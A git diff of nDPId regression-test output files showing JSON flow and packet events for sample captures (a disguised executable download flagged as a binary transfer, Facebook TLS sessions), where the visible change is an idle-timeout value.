{"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":0,"content_type":"","user_agent":"WinHTTP loader\/1.0"}} +01045{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569434903040,"flow_last_seen":1569434904053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1609,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1569434904053,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"185.98.87.185","url":"185.98.87.185\/tablone.png","code":200,"content_type":"image\/png","user_agent":"WinHTTP loader\/1.0"}} 
+00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":534,"flow_first_seen":1569434903040,"flow_last_seen":1569434972556,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":500597,"flow_avg_l4_payload_len":937,"midstream":0,"thread_ts_msec":1569434972556,"l3_proto":"ip4","src_ip":"10.9.25.101","dst_ip":"185.98.87.185","src_port":49197,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":534,"source":"exe_download_as_png.pcap","alias":"nDPId-test","packets-captured":534,"packets-processed":534,"total-skipped-flows":0,"total-l4-data-len":500597,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1569434972556} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 534/534 diff --git a/test/results/facebook.pcap.out b/test/results/facebook.pcap.out index 33aa5fee1..c081953ff 100644 --- a/test/results/facebook.pcap.out +++ b/test/results/facebook.pcap.out 
@@ -1,20 +1,20 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"facebook.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1472393122365} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393122365,"flow_last_seen":1472393122365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393122365,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} -00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} -01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393122365,"flow_last_seen":1472393122365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393122365,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1472393122365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122365,"pkt":"mAyC0zx8MFLLbJwbCABFAAA84M9AAEAGjxHAqCsSQtycRMtiAbv14btyAAAAAKACchDLCQAAAgQFtAQCCAoAS1u9AAAAAAEDAwc="} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393122668,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAE0GYuFC3JxEwKgrEgG7y2LsHfNy9eG7c6ASNpzIhwAAAgQFeAQCCAq7uwhkAEtbvQEDAwg="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393122668,"pkt":"mAyC0zx8MFLLbJwbCABFAAA04NBAAEAGjxjAqCsSQtycRMtiAbv14btz7B3zc4AQAOXLAQAAAQEICgBLXBi7uwhk"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393122365,"flow_last_seen":1472393122668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1472393122668,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 
+00918{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393122365,"flow_last_seen":1472393122981,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1472393122981,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"facebook.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +01363{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1472393122365,"flow_last_seen":1472393122982,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3369,"flow_avg_l4_payload_len":336,"midstream":0,"thread_ts_msec":1472393122982,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"facebook.com","server_names":"*.facebook.com,*.facebook.net,*.fb.com,*.fbcdn.net,*.fbsbx.com,*.m.facebook.com,*.messenger.com,*.xx.fbcdn.net,*.xy.fbcdn.net,*.xz.fbcdn.net,facebook.com,fb.com,messenger.com","ja3":"bfcc1a3891601edb4f137ab7ab25b840","ja3s":"2d1eb5817ece335c24904f516ad5da12","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","alpn":"h2,spdy\/3.1,http\/1.1","fingerprint":"A0:4E:AF:B3:48:C2:6B:15:A8:C1:AA:87:A3:33:CA:A3:CD:EE:C9:C9"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1472393123550,"flow_last_seen":1472393123550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1472393123550,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1472393123550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123550,"pkt":"mAyC0zx8MFLLbJwbCABFAAA8dR1AAEAGZLPAqCsSHw1WJK5GAbsvASg9AAAAAKACchBhGgAAAgQFtAQCCAoAS10gAAAAAAEDAwc="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1472393123682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1472393123682,"pkt":"MFLLbJwbmAyC0zx8CABFAAA8AABAAFMGxtAfDVYkwKgrEgG7rkZw6dh2LwEoPqASNpwMewAAAgQFeAQCCAolRdDWAEtdIAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1472393123682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1472393123682,"pkt":"mAyC0zx8MFLLbJwbCABFAAA0dR5AAEAGZLrAqCsSHw1WJK5GAbsvASg+cOnYd4AQAOVhEgAAAQEICgBLXUglRdDW"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1472393123550,"flow_last_seen":1472393123683,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1472393123683,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} 
+00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1472393123550,"flow_last_seen":1472393123838,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1472393123838,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.facebook.com","ja3":"5c60e71f1b8cd40e4d40ed5b6d666e3f","ja3s":"96681175a9547081bf3d417f1a572091","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,spdy\/3.1,http\/1.1"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1472393122365,"flow_last_seen":1472393123665,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4475,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"66.220.156.68","src_port":52066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1472393123550,"flow_last_seen":1472393124229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":22044,"flow_avg_l4_payload_len":537,"midstream":0,"thread_ts_msec":1472393124229,"l3_proto":"ip4","src_ip":"192.168.43.18","dst_ip":"31.13.86.36","src_port":44614,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"facebook.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-data-len":26519,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1472393124229} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 60/60 diff --git a/test/results/firefox.pcap.out b/test/results/firefox.pcap.out index 6189a8960..999ccef90 100644 --- a/test/results/firefox.pcap.out +++ b/test/results/firefox.pcap.out 
@@ -1,47 +1,47 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"firefox.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620927997754} 